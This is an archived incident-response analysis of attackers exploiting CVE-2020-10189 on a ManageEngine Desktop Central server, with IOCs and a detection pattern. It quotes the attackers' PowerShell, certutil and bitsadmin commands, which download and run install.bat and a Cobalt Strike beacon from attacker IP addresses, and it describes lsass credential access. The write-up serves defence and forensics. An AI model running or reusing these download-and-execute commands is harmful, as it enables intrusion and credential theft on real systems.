{
	"id": "730858cb-93e1-4c24-9a2e-fc705f4458fb",
	"created_at": "2026-04-06T00:07:35.596985Z",
	"updated_at": "2026-04-10T03:21:27.160056Z",
	"deleted_at": null,
	"sha1_hash": "fbd3f0da04889c02840ec637d7f4b017caa172b2",
	"title": "Analysis Of Exploitation: CVE-2020-10189",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1202001,
	"plain_text": "Analysis Of Exploitation: CVE-2020-10189\r\nBy Luke Rusten\r\nArchived: 2026-04-05 15:23:53 UTC\r\nThe Recon incident response team recently worked an intrusion case involving a ManageEngine Desktop Central server that\r\nwas affected by CVE-2020-10189.\r\nZoho ManageEngine Desktop Central 10 allows remote code execution because of deserialization of untrusted\r\ndata in getChartImage in the FileStorage class. This is related to the CewolfServlet and\r\nMDMLogUploaderServlet servlets.\r\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle\r\nRemote Code Execution vulnerability disclosed on Twitter\r\nDuring our research of Desktop Central vulnerabilities we located a post on Twitter from a researcher who had disclosed an\r\nRCE for Desktop Central on March 5, 2020 (Figure 1).\r\nFigure 1 - Vulnerability disclosed on Twitter\r\nResearch on CVE-2020-10189 also showed that vulnerable Desktop Central servers were searchable on Shodan, a popular\r\nsearch engine for Internet-connected devices often used by attackers looking for vulnerable targets (Figure 2).\r\nFigure 2 - Vulnerable Desktop Central servers searchable on Shodan\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 1 of 11\n\nInitial compromise was determined based on a suspicious PowerShell download cradle that contained instructions to\r\ndownload files from a dotted quad url.\r\nOne of the earliest activities carried out by the actor are a few suspicious PowerShell download commands.  The commands\r\ncontained instructions to download  install.bat  and  storesyncsvc.dll  to  C:\\Windows\\Temp  and then immediately\r\nexecute  install.bat  (figure 3).\r\ncmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.\r\nFigure 3 - Suspicious PowerShell download commands\r\nThe  install.bat  script contained instructions to install  storesyncsvc.dll  as a service on the system. (Figure 4).\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 2 of 11\n\nFigure 4 - Install.bat contents\r\nPredictably, within seconds of the suspicious PowerShell commands being run, we observed the installation of a new service\r\nwith the Service Name  StorSyncSvc  and Display Name of  Storage Sync Service  (Figure 5).\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 3 of 11\n\nFigure 5 - Storage Sync Service install\r\nOSINT quickly confirmed  storesyncsvc.dll  to be previously observed by others hit by this campaign. VirusTotal results\r\nindicated that several detection engines had already classified  storesyncsvc.dll  as malware.\r\nhttps://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details\r\nLeveraging Process Tracking to Identify Application Exploitation\r\nKnowing that an RCE had been disclosed via Twitter on March 5, 2020, only a few days prior to this intrusion, we already\r\nhad a strong theory on the attack vector being exploitation of the Zoho ManageEngine Desktop Central application.\r\nReview of Sysmon process creation events indicated that  C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe  was\r\nthe process responsible for executing the PowerShell Download commands (Figure 6).\r\nFigure 6 - ParentImage responsible for PowerShell download\r\nLooking at processes in memory, we also observed the parent/child relationship between the Desktop\r\nCentral  java.exe  application,  cmd.exe  and  2.exe  (Figure 7).\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 4 of 11\n\nFigure 7 -  java.exe  parent/child process relationships\r\nLeveraging Filesystem Artifacts to Identify Application Exploitation\r\nTo further validate our theory, we compared the artifacts that had been collected from the affected Desktop Central server to\r\nthe POC that had been published and determined that the attacker had likely leveraged the CVE-2020-10189 vulnerability to\r\nrun code on this vulnerable system.\r\nThrough filesystem timeline analysis we determined that a traversal file write had likely occurred on the system with the file\r\nnames   _chart  (Figure 8) and  logger.zip  (Figure 9).  \r\nFigure 8 - File system analysis  _chart\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 5 of 11\n\nFigure 9 - File system analysis  logger.zip\r\nThese file names were also referenced in the POC that had been released by @Steventseeley (Figure 10).\r\nFigure 10 - POC references to  _chart  and  logger.zip , reference: https://srcincite.io/pocs/src-2020-\r\n0011.py.txt\r\nCommand and Control Payload Introduced To System\r\nSubsequent process creation logs revealed  cmd.exe  and  certutil.exe  commands being used to download and\r\nexecute  2.exe  (Figure 11). Further analysis revealed a high likelihood of   2.exe  being part of the popular post-exploitation and C2 tool Cobalt Strike.\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 6 of 11\n\ncmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe \u0026\u0026 2.exe\r\nFigure 11 - Certutil commands \r\nOSINT revealed that  2.exe  was already identified as malware by several detection engines on\r\nVirusTotal: https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/detai\r\nLeveraging app.any.run sandbox (Figure 12) and memory analysis of the malware further confirmed the likelihood\r\nof  2.exe  being a hosted Cobalt Strike Beacon payload.\r\nFigure 12 -  2.exe  classified as Cobalt Strike Beacon\r\nhttps://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-\r\n8e6d-94c6c80a74b6\r\nYARA ANALYSIS SUPPORTS 2.EXE CLASSIFICATION AS COBALT STRIKE\r\nWe performed a yara scan against all memory sections in use by the known malware,  2.exe  . The yara scan results further\r\nsupported the theory of  2.exe  resembling a Cobalt Strike beacon among several other possible malware signature hits\r\n(Figure 13).\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 7 of 11\n\nFigure 13 - Yarascan results\r\nLeveraging Volatility’s malfind plugin, we identified several memory sections with potential signs of code injection.  We\r\nfired off another yara scan, this time against the memory sections dumped by malfind. This provided additional validation of\r\nthe likely presence of a Cobalt Strike Beacon. See that entire process in the asciinema recording below (Figure 14).\r\n \r\ntotal 12M\r\ndrwxr-xr-x 2 root root 4.0K Mar 9 20:36 .\r\ndrwxr-xr-x 3 root root 4.0K Mar 10 02:35 ..\r\n-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a1bd05080.0xe40000.dmp\r\n-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a1d486800.0x1170000.dmp\r\n-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a1d486800.0x3790000.dmp\r\n-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a1ddaf080.0xfe0000.dmp\r\n-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a21f78740.0x1aaf8510000.dmp\r\n-rw-r--r-- 1 root root 64K Mar 9 20:36 process.0xffffd00a23986800.0x20a9a9e0000.dmp\r\n-rw-r--r-- 1 root root 1.0M Mar 9 20:36 process.0xffffd00a2502d280.0x2131e280000.dmp\r\n-rw-r--r-- 1 root root 2.0M Mar 9 20:36 process.0xffffd00a2502d280.0x2131e380000.dmp\r\n-rw-r--r-- 1 root root 4.0K Mar 9 20:36 process.0xffffd00a2d400800.0x120000.dmp\r\n-rw-r--r-- 1 root root 4.0M Mar 9 20:36 process.0xffffd00a2d400800.0x2660000.dmp\r\n-rw-r--r-- 1 root root 276K Mar 9 20:36 process.0xffffd00a2d400800.0x2ca0000.dmp\r\n-rw-r--r-- 1 root root 4.5M Mar 9 20:36 process.0xffffd00a2d7ef800.0x21738f20000.dmp\r\nroot@siftworkstation : /cases/desktopcentral/DesktopCentral\r\n# apt install yara -y\r\nReading package lists... Done\r\nBuilding dependency tree\r\nReading state information... Done\r\nThe following NEW packages will be installed:\r\n yara\r\n0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.\r\nNeed to get 117 kB of archives.\r\nAfter this operation, 555 kB of additional disk space will be used.\r\nGet:1 http://us.archive.ubuntu.com/ubuntu xenial/universe amd64 yara amd64 3.4.0+dfsg-2build1 [117 kB]\r\nFetched 117 kB in 0s (191 kB/s)\r\nSelecting previously unselected package yara.\r\n(Reading database ... 251659 files and directories currently installed.)\r\nPreparing to unpack .../yara_3.4.0+dfsg-2build1_amd64.deb ...\r\nUnpacking yara (3.4.0+dfsg-2build1) ...\r\nProcessing triggers for man-db (2.7.5-1) ...\r\nSetting up yara (3.4.0+dfsg-2build1) ...\r\nroot@siftworkstation : /cases/desktopcentral/DesktopCentral\r\n#\r\n \r\nFigure 14 - Yarascan against malfind output\r\nWe then examined malfind’s output for evidence of code injection and identified suspicious memory sections\r\nwithin  svchost.exe  (Figure 15).  OSINT research led us to a researcher that had reversed the malware and found the area\r\nresponsible for injecting code into  svchost.exe  (Figure 16).  \r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 8 of 11\n\nFigure 15 - Our analysis of svchost containing injected code\r\nFigure 16 - @VK_Intel’s analysis showing likely inject function\r\nReference:\r\nAmong the post-compromise activities, we observed malicious Bitsadmin commands that contained instructions to\r\ntransfer  install.bat  from  66.42.96.220  over suspicious port  12345 .\r\nOur analysts observed bitsadmin commands being run on the Desktop Central server which contained the same IP address,\r\nport and the same install.bat file called in the PowerShell download commands (Figure 17).\r\ncmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\\Users\\Public\\install.bat\r\nFigure 17 - Bitsadmin commands\r\nCredential Access\r\nWe also observed potential credential access activity. A common technique for attackers to perform credential dumping is\r\nusing a malicious process (SourceImage) to access another process (the TargetImage). Most commonly,  lsass.exe  is\r\ntargeted as it often contains sensitive information such as account credentials.\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 9 of 11\n\nHere, we observed the SourceImage  2.exe  accessing the TargetImage  lsass.exe  (Figure 18).  The Cobalt Strike Beacon\r\ncontains native credential dumping capabilities similar to Mimikatz. The only required condition to use this capability is\r\nSYSTEM privileges, which the attacker had.  The event below provides sufficient evidence that the risk of credential access\r\nis high.\r\nFigure 18 -  2.exe  accessing  lsass.exe\r\nDuring our analysis of this intrusion, we added a few collection targets to Eric Zimmerman's KAPE tool to add the relevant\r\nlogs to triage efforts. Read more about KAPE.\r\nExample usage targeting relevant logs (tune for your use-case):\r\nkape.exe --tsource C: --tdest c:\\temp\\tout --tflush --target ManageEngineLogs\r\nIOCs\r\nStoresyncsvc.dll\r\nMD5:  5909983db4d9023e4098e56361c96a6f\r\nSHA256:  f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c\r\nInstall.bat\r\nMD5:  7966c2c546b71e800397a67f942858d0\r\nSHA256:  de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc\r\n2.exe\r\nMD5:  3e856162c36b532925c8226b4ed3481c\r\nSHA256:  d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309\r\n66[.]42[.]98[.]220\r\n91[.]208[.]184[.]78\r\n74[.]82[.]201[.]8\r\nDetection\r\nFlorian Roth of the Sigma project has created a signature to detect some of the techniques leveraged by the attackers:\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml\r\nOur analysis of this attack also found that detection based on command-line activity in process creation logs would be\r\nvaluable.\r\nParentImage | endswith:\r\n'DesktopCentral_Server\\jre\\bin\\java.exe'\r\nCommandLine | contains:\r\n'*powershell*'\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 10 of 11\n\n'*certutil*'\r\n'*bitsadmin*'\r\nDFIR, Incident Response, Forensics, SecOps, InfoSec, Defense, Malware, Exploit, CVE-2020-10189, Intel Sharing, Zoho,\r\nVulnerability, ManageEngine\r\nSource: https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nhttps://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/"
	],
	"report_names": [
		"analysis-of-exploitation-cve-2020-10189"
	],
	"threat_actors": [],
	"ts_created_at": 1775434055,
	"ts_updated_at": 1775791287,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fbd3f0da04889c02840ec637d7f4b017caa172b2.pdf",
		"text": "https://archive.orkl.eu/fbd3f0da04889c02840ec637d7f4b017caa172b2.txt",
		"img": "https://archive.orkl.eu/fbd3f0da04889c02840ec637d7f4b017caa172b2.jpg"
	}
}